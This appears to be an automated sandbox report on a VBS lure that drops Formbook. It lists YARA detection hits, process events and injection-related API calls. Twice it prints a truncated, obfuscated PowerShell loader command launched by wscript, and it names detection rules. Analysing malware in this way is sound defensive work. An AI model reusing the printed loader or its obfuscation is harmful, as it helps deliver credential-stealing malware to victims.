Source: 00000011.00000002.781212981.0000000002730000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000011.00000002.781212981.0000000002730000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000011.00000002.779930752.0000000000280000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000011.00000002.779930752.0000000000280000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com

Wscript starts Powershell (via cmd or directly)

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Vakanc = """NFFuSnLcKtPiOoPnC ECFrsoBuBpSiGeFrdsCrU0J2h T{S A W S HpMaUrWaTmK(M[SSbtBrriTnMgA]U`$LTSiTlWbRlUitvC)B;P L`$MFMoUdLfUsStu P=M I`$ETMiSlMbElFiRvT.SLPeRnCgRtLhR;S A s V N`$TSUkBablflSeLtAeBfs P=U FNMekwR-GOSbTjUefcAtT FbTyOtIeN[T]D P(D`$UFwoDdPfUsStH C/u S2F)f;L M d S EFToKrS(S`$SdaeCpBeRnpdCeZnasH=F0a;I B`$BdGeSpreOnPdGeMnSsB P-KlBtM A`$PFFoKdafSsHtC;P U`$SdIeUpFeMnfdOeEnFsI+V=M2K)H{m a S u D`$CoYsPtTeAoEpUlRaA p=O A`$ITDiMlCbClBiOvB.GSTuGbBsStTrPiKnUgB(M`$OdFeSpLePnAdDeBnSsS,R S2F)A;E D A U M`$PSAkLaOlSlPeMtSeEfA[C`$UdSeFpSePnOdSeMnHsV/V2A]V D=B T[CcAoSnBvIeArBtT]V:J:ITFoHBFybtkeC(R`$FoBsHtDeMoVpSlfaP,D B1L6R)P;K D L`$SSBkUaSlSlReEtFeOfV[I`$RdPeSpLePnZdkeCnPsD/T2A]R C=u D(H`$NSUkVaTlClVeFtMeNfU[U`$DdUePpMeInBdNeBnLsE/P2I]O I-PbmxToBrS s1I0S2P)P;N O S U S}S R[PSTtPrDiEnTgB]u[ESAyRsAtBeBmm.STKeBxPtH.KEAnWcUoBdEiGnmgK]L:A:NAPSHCVIPIS.EGMeHtmSDttrEiCnVgL(S`$RSMkAaOlUlMeAtOeLfU)C;S}PSPeEtP-HCVoBnDtUeFnHtB n'BEM:S\ECOrMoSuCpNiSeSrBsKrE0U3H'A B'U2V'P;S`$tDmeCpLrUaR V=G AGSePtn-GCSoGnGtYeFnLtS G'SEL:M\RCRrsoTuIpLiCeArtsHrA0G3S'S;o`$RBEoUuKgN0T=PCgrHoLuApGiBeMrBsSrS0B2K T'H3A5P1OFA1F5E1P2b0A3P0UBo4F8M0L2B0wAB0CAL'S;GiGfU A(s`$TDKeEpnrAaK H-QeLqk P'O2B'R)f R{B`$uBcoNuCgE0W=M'S'M}F;P`$ABBoPuKgC1B=CCFrGoPuTpRiSeCrDsSrT0R2V T'S2IBB0uFP0B5A1G4B0M9N1A5K0F9s0D0T1F2H4k8V3S1L0uFD0S8G5v5N5G4S4T8S3D3P0S8V1S5m0T7S0A0U0A3M2P8F0B7O1N2H0RFw1J0T0P3j2CBS0F3M1s2H0SED0P9K0O2F1B5P'F;D`$IBNofuLgM2G=MCTruoEuSpCiTeIrSsIrT0O2l S'M2G1S0s3S1O2K3T6I1O4L0K9R0F5I2U7M0P2R0B2C1F4G0F3S1S5F1U5A'L;h`$TBKoVusgM3E=SCSrDoFuOpNiKeRrSsKrS0s2U X'A3M5O1fFT1S5K1D2F0A3o0SBW4H8D3D4U1M3s0K8E1S2A0VFL0HBI0S3O4S8P2HFC0I8e1P2B0F3R1W4S0T9P1T6W3G5P0E3F1D4S1B0P0SFR0A5B0B3T1O5U4G8E2BEP0C7H0B8S0C2b0CAH0n3B3F4T0Z3S0a0F'A;D`$ABNoQuMgT4H=CCDrBoDuSpPiCeTrZsHrD0M2t T'm1T5I1O2V1D4u0EFC0e8U0G1W'R;H`$SBPoKuLgc5s=GCurUoEuRpTiSeNrbsLrF0A2P P'R2O1T0O3U1S2D2TBV0P9H0U2F1C3B0nAG0N3S2KEE0L7B0O8S0F2V0uAR0W3D'U;S`$FBPoSuDgO6F=PCSrSoSuApTiSeTresSrT0h2S T'T3S4F3P2H3U5T1n6u0l3B0I5A0SFI0K7H0FAT2L8N0S7A0FBs0n3m4DAA4T6U2ZED0AFI0W2P0K3R2E4T1SFF3I5V0TFM0A1P4TAS4G6B3C6S1L3O0r4H0MAE0BFU0M5A'A;C`$SBIoTukgR7S=CCGrAoFufpCiUeCrUsUrB0E2W F'A3A4P1K3P0I8O1U2S0OFM0TBP0K3S4HAA4T6L2UBP0S7L0F8D0g7S0T1L0Z3A0M2E'S;P`$TBFoFuFgu8B=BCJrSoBuCpRiUePrPsTrM0S2H T'K3C4P0B3B0H0C0CAB0F3P0T5U1S2E0S3U0U2M2H2P0C3P0SAH0I3S0U1K0T7P1P2n0a3S'T;J`$GBSoLuFgM9V=ACerHoruOpPiSeTrDsNrS0N2N A'm2aFF0P8G2HBJ0S3A0PBt0S9P1D4A1FFF2PBS0S9O0S2S1C3t0DAf0S3B'D;R`$CSHpFrIgKeE0R=ICBrUoAuLpDiBeUrHsPrB0G2Z P'U2CBB1SFC2O2P0M3D0eAS0S3O0I1L0T7A1U2k0D3P3N2A1tFr1K6M0H3L'O;D`$USSpOrFgCeO1F=SCRrNoSuFpHiKeIrBsOrR0F2B R'G2U5W0HAS0H7A1D5M1L5A4BAd4S6B3G6J1A3S0W4D0RAH0TFK0H5S4SAL4P6S3D5P0F3L0G7e0EAH0C3l0r2d4SAM4R6T2U7R0H8g1N5S0HFF2W5S0FAC0K7K1B5U1H5d4BAR4F6F2L7m1F3D1O2S0p9O2M5M0TAp0P7C1P5S1S5I'f;S`$gSApCrUgPeE2U=KCJrCoGuGpSiBeSrPsErT0T2S R'R2gFU0t8S1S0T0D9I0IDF0C3G'P;M`$TSBpArQgMeh3F=MCurDosuPpFiBeMrAsGrK0S2A K'G3C6K1A3v0A4P0AAd0PFB0K5V4RAC4H6c2sEH0UFC0H2M0D3S2D4K1aF
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Vakanc = """NFFuSnLcKtPiOoPnC ECFrsoBuBpSiGeFrdsCrU0J2h T{S A W S HpMaUrWaTmK(M[SSbtBrriTnMgA]U`$LTSiTlWbRlUitvC)B;P L`$MFMoUdLfUsStu P=M I`$ETMiSlMbElFiRvT.SLPeRnCgRtLhR;S A s V N`$TSUkBablflSeLtAeBfs P=U FNMekwR-GOSbTjUefcAtT FbTyOtIeN[T]D P(D`$UFwoDdPfUsStH C/u S2F)f;L M d S EFToKrS(S`$SdaeCpBeRnpdCeZnasH=F0a;I B`$BdGeSpreOnPdGeMnSsB P-KlBtM A`$PFFoKdafSsHtC;P U`$SdIeUpFeMnfdOeEnFsI+V=M2K)H{m a S u D`$CoYsPtTeAoEpUlRaA p=O A`$ITDiMlCbClBiOvB.GSTuGbBsStTrPiKnUgB(M`$OdFeSpLePnAdDeBnSsS,R S2F)A;E D A U M`$PSAkLaOlSlPeMtSeEfA[C`$UdSeFpSePnOdSeMnHsV/V2A]V D=B T[CcAoSnBvIeArBtT]V:J:ITFoHBFybtkeC(R`$FoBsHtDeMoVpSlfaP,D B1L6R)P;K D L`$SSBkUaSlSlReEtFeOfV[I`$RdPeSpLePnZdkeCnPsD/T2A]R C=u D(H`$NSUkVaTlClVeFtMeNfU[U`$DdUePpMeInBdNeBnLsE/P2I]O I-PbmxToBrS s1I0S2P)P;N O S U S}S R[PSTtPrDiEnTgB]u[ESAyRsAtBeBmm.STKeBxPtH.KEAnWcUoBdEiGnmgK]L:A:NAPSHCVIPIS.EGMeHtmSDttrEiCnVgL(S`$RSMkAaOlUlMeAtOeLfU)C;S}PSPeEtP-HCVoBnDtUeFnHtB n'BEM:S\ECOrMoSuCpNiSeSrBsKrE0U3H'A B'U2V'P;S`$tDmeCpLrUaR V=G AGSePtn-GCSoGnGtYeFnLtS G'SEL:M\RCRrsoTuIpLiCeArtsHrA0G3S'S;o`$RBEoUuKgN0T=PCgrHoLuApGiBeMrBsSrS0B2K T'H3A5P1OFA1F5E1P2b0A3P0UBo4F8M0L2B0wAB0CAL'S;GiGfU A(s`$TDKeEpnrAaK H-QeLqk P'O2B'R)f R{B`$uBcoNuCgE0W=M'S'M}F;P`$ABBoPuKgC1B=CCFrGoPuTpRiSeCrDsSrT0R2V T'S2IBB0uFP0B5A1G4B0M9N1A5K0F9s0D0T1F2H4k8V3S1L0uFD0S8G5v5N5G4S4T8S3D3P0S8V1S5m0T7S0A0U0A3M2P8F0B7O1N2H0RFw1J0T0P3j2CBS0F3M1s2H0SED0P9K0O2F1B5P'F;D`$IBNofuLgM2G=MCTruoEuSpCiTeIrSsIrT0O2l S'M2G1S0s3S1O2K3T6I1O4L0K9R0F5I2U7M0P2R0B2C1F4G0F3S1S5F1U5A'L;h`$TBKoVusgM3E=SCSrDoFuOpNiKeRrSsKrS0s2U X'A3M5O1fFT1S5K1D2F0A3o0SBW4H8D3D4U1M3s0K8E1S2A0VFL0HBI0S3O4S8P2HFC0I8e1P2B0F3R1W4S0T9P1T6W3G5P0E3F1D4S1B0P0SFR0A5B0B3T1O5U4G8E2BEP0C7H0B8S0C2b0CAH0n3B3F4T0Z3S0a0F'A;D`$ABNoQuMgT4H=CCDrBoDuSpPiCeTrZsHrD0M2t T'm1T5I1O2V1D4u0EFC0e8U0G1W'R;H`$SBPoKuLgc5s=GCurUoEuRpTiSeNrbsLrF0A2P P'R2O1T0O3U1S2D2TBV0P9H0U2F1C3B0nAG0N3S2KEE0L7B0O8S0F2V0uAR0W3D'U;S`$FBPoSuDgO6F=PCSrSoSuApTiSeTresSrT0h2S T'T3S4F3P2H3U5T1n6u0l3B0I5A0SFI0K7H0FAT2L8N0S7A0FBs0n3m4DAA4T6U2ZED0AFI0W2P0K3R2E4T1SFF3I5V0TFM0A1P4TAS4G6B3C6S1L3O0r4H0MAE0BFU0M5A'A;C`$SBIoTukgR7S=CCGrAoFufpCiUeCrUsUrB0E2W F'A3A4P1K3P0I8O1U2S0OFM0TBP0K3S4HAA4T6L2UBP0S7L0F8D0g7S0T1L0Z3A0M2E'S;P`$TBFoFuFgu8B=BCJrSoBuCpRiUePrPsTrM0S2H T'K3C4P0B3B0H0C0CAB0F3P0T5U1S2E0S3U0U2M2H2P0C3P0SAH0I3S0U1K0T7P1P2n0a3S'T;J`$GBSoLuFgM9V=ACerHoruOpPiSeTrDsNrS0N2N A'm2aFF0P8G2HBJ0S3A0PBt0S9P1D4A1FFF2PBS0S9O0S2S1C3t0DAf0S3B'D;R`$CSHpFrIgKeE0R=ICBrUoAuLpDiBeUrHsPrB0G2Z P'U2CBB1SFC2O2P0M3D0eAS0S3O0I1L0T7A1U2k0D3P3N2A1tFr1K6M0H3L'O;D`$USSpOrFgCeO1F=SCRrNoSuFpHiKeIrBsOrR0F2B R'G2U5W0HAS0H7A1D5M1L5A4BAd4S6B3G6J1A3S0W4D0RAH0TFK0H5S4SAL4P6S3D5P0F3L0G7e0EAH0C3l0r2d4SAM4R6T2U7R0H8g1N5S0HFF2W5S0FAC0K7K1B5U1H5d4BAR4F6F2L7m1F3D1O2S0p9O2M5M0TAp0P7C1P5S1S5I'f;S`$gSApCrUgPeE2U=KCJrCoGuGpSiBeSrPsErT0T2S R'R2gFU0t8S1S0T0D9I0IDF0C3G'P;M`$TSBpArQgMeh3F=MCurDosuPpFiBeMrAsGrK0S2A K'G3C6K1A3v0A4P0AAd0PFB0K5V4RAC4H6c2sEH0UFC0H2M0D3S2D4K1aF			Jump to behavior

Very long command line found

Source: C:\Windows\System32\wscript.exe	Process created: Commandline size = 14402
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: Commandline size = 6975
Source: C:\Windows\System32\wscript.exe	Process created: Commandline size = 14402	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: Commandline size = 6975	Jump to behavior

Sample has a suspicious name (potential lure to open the executable)

Source: GlobalImagingDocuments9575734549684.vbs

Static file information: Suspicious name

Source: amsi64_6128.amsi.csv, type: OTHER	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth (Nextron Systems), description = Detects obfuscated PowerShell hacktools, score = , reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2022-06-12
Source: 00000000.00000003.263614790.0000026B1721D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth (Nextron Systems), description = Detects obfuscated PowerShell hacktools, score = , reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2022-06-12
Source: 00000000.00000003.263715508.0000026B17243000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth (Nextron Systems), description = Detects obfuscated PowerShell hacktools, score = , reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2022-06-12
Source: 00000000.00000002.267192402.0000026B17357000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth (Nextron Systems), description = Detects obfuscated PowerShell hacktools, score = , reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2022-06-12
Source: 0000000D.00000002.498599133.0000000002CC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000D.00000002.498599133.0000000002CC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000003.265026295.0000026B17357000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth (Nextron Systems), description = Detects obfuscated PowerShell hacktools, score = , reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2022-06-12
Source: 00000000.00000003.263614790.0000026B1723E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth (Nextron Systems), description = Detects obfuscated PowerShell hacktools, score = , reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2022-06-12
Source: 00000000.00000003.266039874.0000026B17357000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth (Nextron Systems), description = Detects obfuscated PowerShell hacktools, score = , reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2022-06-12
Source: 00000000.00000003.266239984.0000026B1721D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth (Nextron Systems), description = Detects obfuscated PowerShell hacktools, score = , reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2022-06-12
Source: 00000000.00000003.265922370.0000026B17357000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth (Nextron Systems), description = Detects obfuscated PowerShell hacktools, score = , reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2022-06-12
Source: 00000000.00000003.253488505.0000026B17201000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: SUSP_LNK_SuspiciousCommands date = 2018-09-18, author = Florian Roth (Nextron Systems), description = Detects LNK file with suspicious content, score =
Source: 0000000D.00000002.498760711.0000000002D40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000D.00000002.498760711.0000000002D40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000011.00000002.781341923.0000000002B00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000011.00000002.781341923.0000000002B00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000003.265270839.0000026B17307000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth (Nextron Systems), description = Detects obfuscated PowerShell hacktools, score = , reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2022-06-12
Source: 00000000.00000003.265653737.0000026B17357000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth (Nextron Systems), description = Detects obfuscated PowerShell hacktools, score = , reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2022-06-12
Source: 00000000.00000002.266860344.0000026B15502000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth (Nextron Systems), description = Detects obfuscated PowerShell hacktools, score = , reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2022-06-12
Source: 00000011.00000002.781212981.0000000002730000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000011.00000002.781212981.0000000002730000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000011.00000002.779930752.0000000000280000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000011.00000002.779930752.0000000000280000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE

Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 13_3_22560240	13_3_22560240
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 13_3_2255C756	13_3_2255C756
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 13_3_22542F40	13_3_22542F40
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 13_3_2255C42C	13_3_2255C42C
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 13_2_22726E30	13_2_22726E30
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 13_2_227D2EF7	13_2_227D2EF7
Source: C:\Windows\explorer.exe	Code function: 16_2_0599EFA0	16_2_0599EFA0
Source: C:\Windows\explorer.exe	Code function: 16_2_0599EFA2	16_2_0599EFA2
Source: C:\Windows\explorer.exe	Code function: 16_2_059A11F2	16_2_059A11F2
Source: C:\Windows\explorer.exe	Code function: 16_2_059A27F2	16_2_059A27F2
Source: C:\Windows\explorer.exe	Code function: 16_2_059A11EC	16_2_059A11EC
Source: C:\Windows\explorer.exe	Code function: 16_2_059A11E7	16_2_059A11E7
Source: C:\Windows\explorer.exe	Code function: 16_2_059A1F3C	16_2_059A1F3C
Source: C:\Windows\explorer.exe	Code function: 16_2_059A0D32	16_2_059A0D32
Source: C:\Windows\explorer.exe	Code function: 16_2_0599C282	16_2_0599C282
Source: C:\Windows\explorer.exe	Code function: 16_2_059A0252	16_2_059A0252
Source: C:\Windows\explorer.exe	Code function: 16_2_059A0E52	16_2_059A0E52
Source: C:\Windows\explorer.exe	Code function: 16_2_0599BC52	16_2_0599BC52
Source: C:\Windows\explorer.exe	Code function: 16_2_0599BC4C	16_2_0599BC4C
Source: C:\Windows\explorer.exe	Code function: 16_2_0599DC72	16_2_0599DC72
Source: C:\Windows\explorer.exe	Code function: 16_2_0599DC66	16_2_0599DC66
Source: C:\Windows\explorer.exe	Code function: 16_2_06ABE282	16_2_06ABE282
Source: C:\Windows\explorer.exe	Code function: 16_2_06ABFC66	16_2_06ABFC66
Source: C:\Windows\explorer.exe	Code function: 16_2_06ABFC72	16_2_06ABFC72
Source: C:\Windows\explorer.exe	Code function: 16_2_06ABDC4C	16_2_06ABDC4C
Source: C:\Windows\explorer.exe	Code function: 16_2_06ABDC52	16_2_06ABDC52
Source: C:\Windows\explorer.exe	Code function: 16_2_06AC2252	16_2_06AC2252
Source: C:\Windows\explorer.exe	Code function: 16_2_06AC2E52	16_2_06AC2E52
Source: C:\Windows\explorer.exe	Code function: 16_2_06AC0FA0	16_2_06AC0FA0
Source: C:\Windows\explorer.exe	Code function: 16_2_06AC0FA2	16_2_06AC0FA2
Source: C:\Windows\explorer.exe	Code function: 16_2_06AC31EC	16_2_06AC31EC
Source: C:\Windows\explorer.exe	Code function: 16_2_06AC31E7	16_2_06AC31E7
Source: C:\Windows\explorer.exe	Code function: 16_2_06AC31F2	16_2_06AC31F2
Source: C:\Windows\explorer.exe	Code function: 16_2_06AC47F2	16_2_06AC47F2
Source: C:\Windows\explorer.exe	Code function: 16_2_06AC3F3C	16_2_06AC3F3C
Source: C:\Windows\explorer.exe	Code function: 16_2_06AC2D32	16_2_06AC2D32
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_0300EBB0	17_2_0300EBB0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_02FF6E30	17_2_02FF6E30
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_030A1D55	17_2_030A1D55
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_02FEB090	17_2_02FEB090
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_03002581	17_2_03002581
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_02FE841F	17_2_02FE841F
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_03091002	17_2_03091002
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_02FED5E0	17_2_02FED5E0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_030020A0	17_2_030020A0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_02FD0D20	17_2_02FD0D20
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_02FF4120	17_2_02FF4120
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_02FDF900	17_2_02FDF900
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_02B08D70	17_2_02B08D70
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_02B1FA8D	17_2_02B1FA8D
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_02B01AD0	17_2_02B01AD0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_02B0A200	17_2_02B0A200
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_02B03A50	17_2_02B03A50
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_02B20BC6	17_2_02B20BC6
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_02B1E890	17_2_02B1E890
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_02B03830	17_2_02B03830
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_02B0382B	17_2_02B0382B
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_02B21061	17_2_02B21061
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_02B20506	17_2_02B20506

Source: C:\Windows\SysWOW64\cmd.exe

Code function: String function: 02FDB150 appears 32 times

Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 13_2_22749660 NtAllocateVirtualMemory,LdrInitializeThunk,	13_2_22749660
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 13_2_22749A50 NtCreateFile,LdrInitializeThunk,	13_2_22749A50
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 13_2_22749A20 NtResumeThread,LdrInitializeThunk,	13_2_22749A20
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 13_2_227496E0 NtFreeVirtualMemory,LdrInitializeThunk,	13_2_227496E0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 13_2_22749710 NtQueryInformationToken,LdrInitializeThunk,	13_2_22749710
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 13_2_22749FE0 NtCreateMutant,LdrInitializeThunk,	13_2_22749FE0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 13_2_227497A0 NtUnmapViewOfSection,LdrInitializeThunk,	13_2_227497A0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 13_2_22749780 NtMapViewOfSection,LdrInitializeThunk,	13_2_22749780
